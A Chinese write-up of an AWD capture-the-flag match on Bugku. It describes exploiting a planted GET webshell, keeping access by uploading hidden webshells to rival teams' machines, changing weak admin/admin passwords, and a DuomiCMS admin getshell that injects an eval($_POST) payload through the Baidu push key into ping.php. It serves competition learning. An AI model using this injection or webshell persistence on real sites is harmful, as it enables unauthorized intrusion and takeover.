Bugku S2 AWD排位赛-2总结

前言:

因为当时报了名没时间打,这两天正好看到了PVP自定义比赛有人开了一盘,就来报名参加了

比赛过程:

第一步:

进入比赛后,首先拿自己的账户密码登录靶机。将源码给dump下来,丢入D盾分析

1633328187345.png

发现在/mobile/player/html/ind1x.php里面有靶机的自带后门,这里是拼接起来的GET型的后门,参数是s

1633328315082.png

这里当然是第一时间拿这个后门去打一波其他靶机,但是此时并不知道其他队伍的IP,只知道是http://192-168-1-X.pvp585.bugku.cn,于是要用到批量ping的工具,工具地址:https://wws.lanzoui.com/i5d9Luv8zji 密码:Le1a

先写个脚本生成一下字典

1
2
3
for i in range(255):
    ip = "192-168-1-" + str(i) +".pvp585.bugku.cn"
    print(ip)

1633331345347.png

然后用这个工具去载入字典.txt去批量ping,红色代表ping不通,绿色代表可以ping通(这里比赛已经结束,所以肯定都是红色的)

1633331475386.png

最后能成功ping通的IP有135 141 155 199 201 230 118 77 34 4 等到加固环节结束后就能第一时间拿到flag并提交。

当然打了第一波后,需要维持权限,毕竟大家都知道有这个后门,如果他们删掉了,我们就没有shell去读flag了。所以这里需要用蚁剑去连他们的后门,然后上传自己的马子到一个隐藏点的地方,确认可以成功连接后,删掉他们的自带后门,这样其他也就没法互相攻击了。(这里我们慢了一步,只删了两个队伍的,然后还太招摇了,把人家源码删了,写到index.php了,到最后一个shell都没了)

第二步:

除了第一步的自带后门,我们尝试寻找网站的后台路径,发现是/admin/,账户密码也是弱口令 admin/admin。第一时间把他们的管理员密码改了,时间没来得及,只改了六个队伍的密码。因为前面的自带后门shell没了,我们就开始尝试对这个网站的后台下手,看看能否后台getshell,由网站首页得知这是duomicms。在网上找到了一篇关于duomicms后台getshell的文章:https://www.jianshu.com/p/b24d3d6da962

在后台->全局->百度推送 这里,准入密钥修改的内容,会写入到 /data/admin/ping.php 文件中

在准入密钥这里填入123456789"; eval($_POST['z']);//,然后点击确认,然后查看我们自己的靶机中data/admin/ping.php 文件,发现可以成功写入马子

1633329555314.png

这里的后台getshell是其他队伍没想到的地方(也有可能是因为后台密码被改,其他队伍没法进入后台),然后才让我们队伍在最后两轮反超拿到第一。因为第一时间删除了自带后门也修改了后台密码,所以全程只有一次被隔壁队伍用pwn攻击了一次。

1633330006851.png

总结:

这是我第二次打awd,第一次就是一直在用靶机自带后门拿分,也没有去维持权限,后门被删除后就没办法了,只有看着自己一直掉分。这一次学到了一些东西,其实还是要拼手速的,一开始就用自带后门去维持权限其实就能拿到不少的分数。然后就是 下次可以用批量提交flag的脚本,这样可以节省不少时间去维持权限以及修复自己靶机的漏洞上面。还有很多自动化的脚本跟工具还没有学到,争取以后能学到更多知识。